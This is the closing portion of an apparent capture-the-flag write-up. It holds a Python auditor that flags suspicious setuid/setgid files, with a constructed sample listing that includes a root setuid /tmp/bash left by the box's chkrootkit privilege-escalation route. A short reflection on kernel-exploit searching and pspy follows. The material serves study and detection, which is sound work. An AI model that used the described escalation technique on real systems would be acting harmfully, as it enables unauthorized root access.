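    "/usr/bin/chsh", "/usr/bin/procmail", "/usr/bin/chfn", "/usr/bin/pkexec",
    "/usr/bin/passwd", "/usr/lib/openssh/ssh-keysign", "/usr/lib/pt_chown",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/lib/authbind/helper",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/sbin/pppd", "/usr/sbin/uuidd",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/sbin/mount.cifs",
    "/sbin/mount.nfs",
}
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
INTERPRETERS = {"bash", "sh", "dash", "zsh", "ksh", "python", "perl", "php"}

# One `find -ls` line: inode blocks mode links owner group size mon day time path
FIND_LS = re.compile(
    r"^\s*\d+\s+\d+\s+(?P<mode>[-bcdlps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+\S+"
    r"\s+\d+\s+[A-Za-z]{3}\s+\d{1,2}\s+\S+\s+(?P<path>/.*)$"
)

# Constructed sample: five lines from the listing above, the /tmp/bash result,
# and one made-up unknown helper that should only trip the baseline check.
SAMPLE = """\
131133 88 -rwsr-xr-x 1 root root 88752 Jun 3 2014 /bin/mount
21755 48 -rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
535 156 -rwsr-xr-x 1 root root 156708 Feb 10 2014 /usr/bin/sudo
22441 20 -rwsr-xr-x 1 root root 18168 Feb 11 2014 /usr/bin/pkexec
29051 88 -rwsr-xr-x 1 root root 88412 Nov 6 2015 /sbin/mount.nfs
29063 944 -rwsr-sr-x 1 root root 986672 Sep 23 10:25 /tmp/bash
40001 12 -rwsr-xr-x 1 root root 9876 Sep 20 11:02 /usr/local/bin/backup-helper
"""

@dataclass(frozen=True)
class Finding:
    path: str
    severity: str
    reason: str

def parse_find_ls(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (path, mode, owner) for every line that looks like find -ls output."""
    out = []
    for line in lines:
        m = FIND_LS.match(line)
        if m:
            out.append((m["path"], m["mode"], m["owner"]))
    return out

def audit_suid(entries: Iterable[Tuple[str, str, str]]) -> List[Finding]:
    """Flag setuid/setgid files by location, by name, and against the baseline."""
    findings = []
    for path, mode, owner in entries:
        setuid, setgid = mode[3] in "sS", mode[6] in "sS"
        if not (setuid or setgid):
            continue
        name = path.rsplit("/", 1)[-1]
        if path.startswith(WORLD_WRITABLE):
            findings.append(Finding(path, "high", "setuid/setgid file in a world-writable directory"))
        if name in INTERPRETERS:
            findings.append(Finding(path, "high", f"setuid copy of interpreter '{name}'"))
        if owner == "root" and path not in BASELINE:
            findings.append(Finding(path, "medium", "root-owned setuid/setgid file not in baseline"))
    return findings

def audit_sample() -> List[Finding]:
    """Run the audit over the constructed SAMPLE listing."""
    return audit_suid(parse_find_ls(SAMPLE.splitlines()))
```

On a live host, pipe the real `find` output into `parse_find_ls` and diff the result against a baseline captured right after provisioning; a root-owned setuid shell under /tmp is the signature this box's chkrootkit route leaves.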

Summary

The web phase of this box was not very hard; the main challenge was identifying the CMS, and I happened to come across the preview image, which gave me the information directly. In the privilege-escalation phase I tested eight or nine exploits and all of them failed. I learned two small tricks here: first, don't search only by kernel version, because the exploit author may not have paid attention to the kernel version (older exploits may have been written less rigorously), so searching by kernel alone can miss one or two exploits; second, the usefulness of pspy, which I had always overlooked.


https://i3eg1nner.github.io/2023/09/6ad0ced59f4a.html
Author: I3eg1nner
Published: 2023-09-23